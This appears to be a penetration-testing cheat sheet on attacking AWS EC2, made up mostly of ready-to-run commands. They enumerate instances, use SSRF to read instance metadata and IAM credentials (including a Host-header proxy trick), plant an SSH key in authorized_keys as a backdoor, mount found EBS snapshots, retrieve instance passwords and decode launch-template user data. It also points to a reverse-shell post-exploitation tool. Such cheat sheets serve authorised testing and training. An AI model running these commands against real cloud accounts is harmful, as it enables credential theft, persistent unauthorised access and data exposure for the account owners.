EC2 - Elastic Compute Cloud

EC2 Enumeration and Exploitation

Amazon Elastic Compute Cloud (EC2) offers broad support for computing, with over 750 instance types and numerous types of available processors, storage, networking, and operating systems.

Enumeration

Describes the information about all instances

aws ec2 describe-instances

Describes the information about specified instance

aws ec2 describe-instances --instance-ids [instace-id]

Describes the information about UserData Attribute of the specified Instance

aws ec2 describe-instance-attribute --atribute userData --instance-id [instance-id]

Describes the infroamtion about IAM instance profile associations

aws ec2 describe-iam-instance-profile-associations

Exploitation

SSRF/RCE

SSRF / RCE

AWS Metadata

• IMDV1

curl http://169.254.169.254/latest/meta-data/

• IMDV2

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

AWS Userdata

• IMDV1

curl http://169.254.169.254/latest/user-data/

• IMDV2

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/

EC2StepShell

GitHub - saw-your-packet/EC2StepShell: EC2StepShell is an AWS post-exploitation tool for getting high privileges reverse shells in public or private EC2 instances.GitHub

Persistence

Generate SSH key pair

ssh-keygen

On EC2 instance, add private key to user ssh directory

echo "ssh_public_key" >> /home/user/.ssh/authorized_keys

Access EC2 using ssh backdoor key

ssh -i "ssh_private_key" user@ec2_public_ip

Privilege Escalation

AWS - EC2 Privesc - HackTricks Cloud

EC2 acting as a reverse-proxy

SSRF / RCE

curl -s http://[EC2_IP]/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

Enumerating EC2s / EBS

aws ec2 describe-instances --profile ec2-profile

Snapshots ?

aws --profile [profile-name] ec2 describe-snapshots --owner-id [account-id] --region us-west-2

Exploit snapshot

EBS - Elastic Block Store

Snapshot found

$ aws --profile 0xss0rz ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  [snap-id]

1. Launch a ec2 instance (create ssh key pair)

2. Attach the snapshot created to the ec2 instance

Connect to the instance and mount the snapshot

$ lsblk
$ sudo mount /dev/xvdb1 /mnt

EC2 - Get Password

aws ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem

Templates

aws ec2 describe-launch-templates --region <region>

aws ec2 describe-launch-template-versions --region us-west-2 --launch-template-id <launch-template-id> --versions $Latest --query "LaunchTemplateVersions[0].LaunchTemplateData.UserData" --output text | base64 -d

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment
• Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud